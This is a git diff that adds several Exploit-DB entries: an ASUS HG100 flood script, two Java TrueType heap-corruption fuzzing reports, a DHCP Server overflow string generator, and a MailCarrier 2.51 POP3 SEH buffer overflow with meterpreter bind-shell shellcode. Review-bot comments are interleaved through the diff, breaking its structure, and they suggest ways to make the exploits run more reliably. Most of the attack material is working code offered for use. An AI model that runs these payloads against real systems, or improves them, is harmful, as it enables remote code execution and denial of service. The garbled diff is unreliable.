diff --git a/exploits/hardware/dos/46720.sh b/exploits/hardware/dos/46720.sh
new file mode 100755
index 000000000..83f3a31a7
--- /dev/null
+++ b/exploits/hardware/dos/46720.sh
@@ -0,0 +1,34 @@
+# Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS
+# Date: 2019-04-14 # Exploit Author: YinT Wang;
+# Vendor Homepage: www.asus.com
+# Version: Hardware version: HG100 、Firmware version: 1.05.12
+# Tested on: Currnet 1.05.12
+# CVE : CVE-2018-11492
+
+1. Description
+The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492).
+
+2.Proof of Concept
+Just Execute the following script in kali which could crash the devices
+
+ 1. IPv4 packet and in result of devices crash.which written in linux script.
+
+ #needed to co-operate with hping3 tool
+ #with the time period at least 220s which could cause web server of HG100 devices crash
+ #!/bin/bash
+ read -p "enter the ip of HG100 here " url
+ hping3 -V -c 10000 -S -w 64 --flood --rand-source $url
+ sleep 220
+ echo "Hping3 –V –c 10000 –S –w 64 –flood –rand-source $url time 220s"
+ exit 0
+
+ 2.Slowhttp test and caused the devices crash.which written in linux script.
+
+ #needed to co-operate with slowhttptest tool
+ #with the time period 600s which could cause web server of HG100 devices crash
+ #!/bin/bash
+ read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url
+ slowhttptest -H -R -c 10000 -l 600 -u $url
+ sleep 600
+ echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s"
+ exit 0
\ No newline at end of file
diff --git a/exploits/multiple/dos/46722.txt b/exploits/multiple/dos/46722.txt
new file mode 100644
index 000000000..32bb41438
--- /dev/null
+++ b/exploits/multiple/dos/46722.txt
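Review bot: The committed `.sh` is not runnable as a script: both `#!/bin/bash` lines sit in the middle of the file after prose such as `1. Description`, so `bash 46720.sh` would try to execute `1.` and `The` as commands before reaching either snippet; the prose belongs in comments or a separate text file. In the hping3 snippet `--flood` keeps sending until hping3 is interrupted (as far as I know the `-c 10000` count does not end a flood run), so `sleep 220` and the `echo` are never reached and the advertised 220 s window is not enforced; `timeout 220` would bound it. `$url` is unquoted, `read` lacks `-r`, and both `echo` lines print en-dashes (`–V –c`) instead of ASCII hyphens, so the echoed command cannot be pasted back into a shell. In the slowhttptest snippet `-l 600` already limits the test to 600 s, so the following `sleep 600` only doubles the wall time.
```sh
#!/bin/bash
set -u
read -r -p "enter the ip of HG100 here " url
# --flood does not return on its own; bound the run so the script actually ends
timeout 220 hping3 -V -c 10000 -S -w 64 --flood --rand-source "$url"
printf 'hping3 -V -c 10000 -S -w 64 --flood --rand-source %s time 220s\n' "$url"
exit 0
```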
@@ -0,0 +1,99 @@ +A heap corruption was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType, implemented in a proprietary t2k library. It manifests itself in the form of the following (or similar) crash: + +--- cut --- + $ bin/java -cp . DisplaySfntFont test.ttf + Iteration (0,0) + *** Error in `bin/java': munmap_chunk(): invalid pointer: 0x00007f5cf82a6490 *** + ======= Backtrace: ========= + /lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f5cfd492bcb] + /lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f5cfd498f96] + jre/8u202/lib/amd64/libt2k.so(+0x5443d)[0x7f5cd563343d] + jre/8u202/lib/amd64/libt2k.so(+0x47b95)[0x7f5cd5626b95] + jre/8u202/lib/amd64/libt2k.so(Java_sun_font_T2KFontScaler_getGlyphImageNative+0xe5)[0x7f5cd560fa25] + [0x7f5ce83a06c7] + ======= Memory map: ======== + 00400000-00401000 r-xp 00000000 fe:01 20840680 jre/8u202/bin/java + 00600000-00601000 r--p 00000000 fe:01 20840680 jre/8u202/bin/java + 00601000-00602000 rw-p 00001000 fe:01 20840680 jre/8u202/bin/java + 02573000-02594000 rw-p 00000000 00:00 0 [heap] + 3d1a00000-3fba00000 rw-p 00000000 00:00 0 + 3fba00000-670900000 ---p 00000000 00:00 0 + 670900000-685900000 rw-p 00000000 00:00 0 + 685900000-7c0000000 ---p 00000000 00:00 0 + 7c0000000-7c00c0000 rw-p 00000000 00:00 0 + 7c00c0000-800000000 ---p 00000000 00:00 0 + [...] + Aborted +--- cut --- + +The crash reproduces on both Windows and Linux platforms. On Linux, it can be also triggered under Valgrind (many out-of-bounds reads and writes in sc_FindExtrema4 were ommitted in the log below): + +--- cut --- + $ valgrind bin/java -cp . DisplaySfntFont test.ttf + [...] 
+ ==211051== Invalid write of size 8 + ==211051== at 0x415B30EE: sc_FindExtrema4 (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x4159A402: fs_FindBitMapSize4 (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415D3247: MakeBWBits (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415CAE44: T2K_RenderGlyphInternal (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415CB3CA: T2K_RenderGlyph (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415B4A24: Java_sun_font_T2KFontScaler_getGlyphImageNative (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x7B8D6C6: ??? + ==211051== by 0x7B7CDCF: ??? + ==211051== by 0x7B7CDCF: ??? + ==211051== by 0x7B7CDCF: ??? + ==211051== by 0x7B7D2BC: ??? + ==211051== by 0x7B7CA8F: ??? + ==211051== Address 0x3f6f1d38 is 19,160 bytes inside a block of size 19,166 alloc'd + ==211051== at 0x4C2BBEF: malloc (vg_replace_malloc.c:299) + ==211051== by 0x415D84A4: tsi_AllocMem (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415B2664: sc_FindExtrema4 (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x4159A402: fs_FindBitMapSize4 (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415D3247: MakeBWBits (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415CAE44: T2K_RenderGlyphInternal (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415CB3CA: T2K_RenderGlyph (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415B4A24: Java_sun_font_T2KFontScaler_getGlyphImageNative (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x7B8D6C6: ??? + ==211051== by 0x7B7CDCF: ??? + ==211051== by 0x7B7CDCF: ??? + ==211051== by 0x7B7CDCF: ??? + [...] +--- cut --- + +or with AFL's libdislocator under gdb: + +--- cut --- + Thread 2 "java" received signal SIGSEGV, Segmentation fault. + [----------------------------------registers-----------------------------------] + [...] + R11: 0x7fffb5d89e82 --> 0x0 + [...] 
+ EFLAGS: 0x10293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow) + [-------------------------------------code-------------------------------------] + 0x7fffb63be972 : lea r11,[r12+r9*2] + 0x7fffb63be976 : je 0x7fffb63bea30 + 0x7fffb63be97c : lea r9d,[r8-0x1] + => 0x7fffb63be980 : add WORD PTR [r11],0x1 + 0x7fffb63be985 : test r9d,r9d + 0x7fffb63be988 : je 0x7fffb63bea30 + 0x7fffb63be98e : add WORD PTR [r11+0x2],0x1 + 0x7fffb63be994 : cmp r8d,0x2 + [...] +--- cut --- + +On Windows, the crash also reliably reproduces with PageHeap enabled for the java.exe process: + +--- cut --- + (244c.1660): Access violation - code c0000005 (first chance) + First chance exceptions are reported before any exception handling. + This exception may be expected and handled. + *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Java\jre1.8.0_202\bin\server\jvm.dll - + jvm+0x8598: + 00000000`61158598 c7040801000000 mov dword ptr [rax+rcx],1 ds:00000000`05860280=00000001 +--- cut --- + +In total, we have encountered crashes in the t2k!sc_FindExtrema4 function in three different locations, in two cases while adding 1 to an invalid memory location, and in one case while adding 2 to an out-of-bounds address. Attached with this report are three mutated testcases (one for each crashing code location), and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter. + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46722.zip \ No newline at end of file diff --git a/exploits/multiple/dos/46723.txt b/exploits/multiple/dos/46723.txt new file mode 100644 index 000000000..2f811c8ac --- /dev/null +++ b/exploits/multiple/dos/46723.txt 
@@ -0,0 +1,115 @@ +A heap corruption was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash: + +--- cut --- + $ bin/java -cp . DisplaySfntFont test.ttf + Iteration (0,0) + # + # A fatal error has been detected by the Java Runtime Environment: + # + # SIGSEGV (0xb) at pc=0x00007f7285b39824, pid=234398, tid=0x00007f7286683700 + # + # JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08) + # Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops) + # Problematic frame: + # C [libc.so.6+0x77824]# [ timer expired, abort... ] + Aborted +--- cut --- + +The crash reproduces on both Windows and Linux platforms. On Linux, it can be also triggered with the MALLOC_CHECK_=3 environment variable: + +--- cut --- + $ MALLOC_CHECK_=3 bin/java -cp . DisplaySfntFont test.ttf + Iteration (0,0) + *** Error in `bin/java': free(): invalid pointer: 0x0000000002876320 *** + ======= Backtrace: ========= + /lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f84185edbcb] + /lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f84185f3f96] + jre/8u202/lib/amd64/libfontmanager.so(+0x1d2b2)[0x7f83ddc672b2] + jre/8u202/lib/amd64/libfontmanager.so(+0x27ff4)[0x7f83ddc71ff4] + jre/8u202/lib/amd64/libfontmanager.so(+0x866f)[0x7f83ddc5266f] + jre/8u202/lib/amd64/libfontmanager.so(Java_sun_font_SunLayoutEngine_nativeLayout+0x230)[0x7f83ddc78990] + [0x7f84076306c7] + ======= Memory map: ======== + 00400000-00401000 r-xp 00000000 fe:01 20840680 jre/8u202/bin/java + 00600000-00601000 r--p 00000000 fe:01 20840680 jre/8u202/bin/java + 00601000-00602000 rw-p 00001000 fe:01 20840680 jre/8u202/bin/java + 023ba000-028d9000 rw-p 00000000 00:00 0 [heap] + 3d1a00000-3fba00000 rw-p 00000000 00:00 0 + 3fba00000-670900000 ---p 00000000 00:00 0 + 670900000-685900000 rw-p 00000000 00:00 0 + 
685900000-7c0000000 ---p 00000000 00:00 0 + 7c0000000-7c00c0000 rw-p 00000000 00:00 0 + 7c00c0000-800000000 ---p 00000000 00:00 0 + [...] +--- cut --- + +... under Valgrind: + +--- cut --- + $ valgrind bin/java -cp . DisplaySfntFont test.ttf + [...] + ==245623== Invalid write of size 2 + ==245623== at 0x40BF2750: GlyphIterator::setCurrGlyphID(unsigned short) (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C0C089: SingleSubstitutionFormat1Subtable::process(LEReferenceTo const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C0C4A4: SingleSubstitutionSubtable::process(LEReferenceTo const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40BF47E5: GlyphSubstitutionLookupProcessor::applySubtable(LEReferenceTo const&, unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const [clone .part.11] (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C01DCE: LookupProcessor::applyLookupTable(LEReferenceTo const&, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C02FBA: LookupProcessor::applySingleLookup(unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40BEBC9C: ContextualSubstitutionBase::applySubstitutionLookups(LookupProcessor const*, LEReferenceToArrayOf const&, unsigned short, GlyphIterator*, LEFontInstance const*, int, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40BEE766: ChainingContextualSubstitutionFormat3Subtable::process(LETableReference const&, LookupProcessor const*, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40BEE8E3: ChainingContextualSubstitutionSubtable::process(LEReferenceTo const&, LookupProcessor const*, 
GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40BF475B: GlyphSubstitutionLookupProcessor::applySubtable(LEReferenceTo const&, unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const [clone .part.11] (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C01DCE: LookupProcessor::applyLookupTable(LEReferenceTo const&, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C02EAB: LookupProcessor::process(LEGlyphStorage&, GlyphPositionAdjustments*, char, LEReferenceTo const&, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== Address 0x3f68a55c is 4 bytes before a block of size 104 alloc'd + ==245623== at 0x4C2BBEF: malloc (vg_replace_malloc.c:299) + ==245623== by 0x40BFD4CF: LEGlyphStorage::allocateGlyphArray(int, char, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40BE875A: ArabicOpenTypeLayoutEngine::characterProcessing(unsigned short const*, int, int, int, char, unsigned short*&, LEGlyphStorage&, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C0815F: OpenTypeLayoutEngine::computeGlyphs(unsigned short const*, int, int, int, char, LEGlyphStorage&, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40BFE55D: LayoutEngine::layoutChars(unsigned short const*, int, int, int, char, float, float, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C0E91F: Java_sun_font_SunLayoutEngine_nativeLayout (in jre/8u202/lib/amd64/libfontmanager.so) + [...] +--- cut --- + +or with AFL's libdislocator under gdb: + +--- cut --- +Continuing. + Iteration (0,0) + *** [AFL] bad allocator canary on free() *** + + Thread 2 "java" received signal SIGABRT, Aborted. + [...] 
+ Stopped reason: SIGABRT + __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 + 51 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. + gdb$ where + #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 + #1 0x00007ffff72313fa in __GI_abort () at abort.c:89 + #2 0x00007ffff7bd651c in free () from libdislocator/libdislocator.so + #3 0x00007fffb892f2b2 in LEGlyphStorage::reset() () from jre/8u202/lib/amd64/libfontmanager.so + #4 0x00007fffb8939ff4 in OpenTypeLayoutEngine::~OpenTypeLayoutEngine() () + from jre/8u202/lib/amd64/libfontmanager.so + #5 0x00007fffb891a66f in ArabicOpenTypeLayoutEngine::~ArabicOpenTypeLayoutEngine() () + from jre/8u202/lib/amd64/libfontmanager.so + #6 0x00007fffb8940990 in Java_sun_font_SunLayoutEngine_nativeLayout () + from jre/8u202/lib/amd64/libfontmanager.so + #7 0x00007fffe5e376c7 in ?? () + #8 0x0000000000000000 in ?? () +--- cut --- + +On Windows, the crash also reliably reproduces with PageHeap enabled for the java.exe process: + +--- cut --- + (1184.4c60): Access violation - code c0000005 (first chance) + First chance exceptions are reported before any exception handling. + This exception may be expected and handled. + fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0x14bf: + 00007ffa`0d6291bf 428124810000ffff and dword ptr [rcx+r8*4],0FFFF0000h ds:00000000`39663ffc=???????? +--- cut --- + +We have encountered crashes in the libfontmanager!GlyphIterator::setCurrGlyphID function while trying to write before and after a heap allocation. Attached with this report are two mutated testcases (for the buffer under- and overflow), and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter. + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46723.zip \ No newline at end of file 
diff --git a/exploits/windows/dos/46721.py b/exploits/windows/dos/46721.py
new file mode 100755
index 000000000..6eb128654
--- /dev/null
+++ b/exploits/windows/dos/46721.py
@@ -0,0 +1,23 @@
+#Exploit Title: DHCP Server 2.5.2 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-16
+#Vendor Homepage: http://www.dhcpserver.de/cms/
+#Software Link: http://www.dhcpserver.de/cms/wp-content/plugins/download-attachments
+#Tested Version: 2.5.2
+#Tested on: Windows 7 x32 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: DHCPSRV_2.5.2.py
+#2.- Open dhcp.txt and copy content to clipboard
+#2.- Open dhcpwiz.exe
+#3.- Click Next
+#4.- In Network Interface cards Select "Local Area Connection" and click on Next
+#5.- In Supported Protocols click on Next
+#6.- In Configuring DHCP for Interface Select "DHCP Options"
+#7.- Select "Bootfile" field and Paste ClipBoard
+#8.- Crashed
+
+cod = "\x41" * 6000
+f = open('dhcp.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/46719.py b/exploits/windows/remote/46719.py
new file mode 100755
index 000000000..e763eedb3
--- /dev/null
+++ b/exploits/windows/remote/46719.py
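Review bot: The crash is triggered by pasting 6000 bytes into a field of the local `dhcpwiz.exe` wizard, so nothing in this hunk is reachable over the network and no register dump or SEH chain is shown; a header line such as `#Impact: local crash of the configuration wizard, no remote trigger or control of execution demonstrated` would keep readers from over-reading the "Denial of Service" title. The step list numbers two different steps as `#2.-`. The output file is opened without a context manager; `with open('dhcp.txt', 'w') as f: f.write(cod)` closes it on every path. The `Software Link` points at a WordPress plugin directory rather than a download of version 2.5.2, so it may need checking.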
@@ -0,0 +1,88 @@ +#!/usr/bin/python +# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "RETR" command(POP3) +# Date: 16/04/2019 +# Exploit Author: Dino Covotsos - Telspace Systems +# Vendor Homepage: https://www.tabslab.com/ +# Version: 2.51 +# Software Link: N.A +# Contact: services[@]telspace.co.za +# Twitter: @telspacesystems (Greets to the Telspace Crew) +# Tested on: Windows XP Prof SP3 ENG x86 +# CVE: TBC from Mitre +# Created for the Telspace Internship 2019 - SEH Exploit +# POC +# 1.) Change ip, username, password and port in code +# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine +#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll) +#N.B For all Mail Carrier exploits, increase/decrease the initial EIP overwrite buffer if your target ip is larger/smaller in digits. +#Crash at 6174 +import sys +import socket +import time + +#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c +shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f" +"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50" +"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63" +"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f" +"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69" +"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72" +"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e" +"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61" 
+"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33" +"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b" +"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46" +"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53" +"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70" +"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b" +"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c" +"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64" +"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59" +"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b" +"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33" +"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c" +"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33" +"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38" +"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74" +"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a" +"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48" +"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69" +"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59" +"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45" +"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b" +"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71" +"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52" +"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44" +"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79" +"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b" +"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75" +"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43" +"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66" +"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f" +"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67" 
+"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b" +"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69" +"\x6f\x78\x55\x41\x41") + +buffer = "A" * 6174 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (10000-6882) + +print "[*] Mail Server 2.51 POP3 Buffer Overflow in RETR command\r\n" +print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +connect=s.connect(("192.168.0.150", 110)) +print s.recv(1024) +print "[*] Sending USERNAME\r\n" +s.send('USER test' + '\r\n') +print s.recv(1024) +print "[*] Sending PASSWORD\r\n" +s.send('PASS test' + '\r\n') +print s.recv(1024) +s.send('RETR ' + buffer + '\r\n') +s.send('QUIT\r\n') +s.close() +time.sleep(1) +print "[*] Done, check for meterpreter shell on target ip port 443!" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 29aa859ef..999951063 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
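Review bot: The SEH handler written as `"\x0c\x11\x0d\x1b"` (0x1b0d110c) contains `\x0d`, one of the bytes excluded from the msfvenom payload via `-b "\x00\xd5\x0a\x0d\x1a\x03"`; if CR really is filtered in the RETR argument the overwrite would be corrupted, so either the badchar list is over-conservative or the gadget deserves a check against the crash, and a comment next to the address should say which. The target IP, port and credentials are hard-coded (`192.168.0.150`, `110`, `test`/`test`) even though the header tells the user to edit them; `sys` is already imported, so taking them from `sys.argv` would avoid editing the file. `s.send(...)` does not guarantee the whole ~10000-byte RETR line is written; `s.sendall('RETR ' + buffer + '\r\n')` does. The `print` statements are Python 2 only, which matches the shebang but is worth stating in the header.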
@@ -6387,6 +6387,10 @@ id,file,description,date,author,type,platform,port
 46708,exploits/windows/dos/46708.py,"PCHelpWare V2 1.0.0.5 - 'SC' Denial of Service (PoC)",2019-04-16,"Alejandra Sánchez",dos,windows,
 46709,exploits/windows/dos/46709.py,"PCHelpWare V2 1.0.0.5 - 'Group' Denial of Service (PoC)",2019-04-16,"Alejandra Sánchez",dos,windows,
 46711,exploits/windows/dos/46711.py,"AdminExpress 1.2.5 - 'Folder Path' Denial of Service (PoC)",2019-04-16,"Mücahit İsmail Aktaş",dos,windows,
+46720,exploits/hardware/dos/46720.sh,"ASUS HG100 - Denial of Service",2019-04-17,"YinT Wang",dos,hardware,
+46721,exploits/windows/dos/46721.py,"DHCP Server 2.5.2 - Denial of Service (PoC)",2019-04-17,"Victor Mondragón",dos,windows,
+46722,exploits/multiple/dos/46722.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4",2019-04-17,"Google Security Research",dos,multiple,
+46723,exploits/multiple/dos/46723.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID",2019-04-17,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -17335,6 +17339,7 @@ id,file,description,date,author,type,platform,port
 46700,exploits/windows/remote/46700.py,"MailCarrier 2.51 - POP3 'LIST' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110
 46701,exploits/windows/remote/46701.py,"MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110
 46705,exploits/hardware/remote/46705.rb,"Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)",2019-04-15,Metasploit,remote,hardware,
+46719,exploits/windows/remote/46719.py,"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow",2019-04-17,"Dino Covotsos",remote,windows,110
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,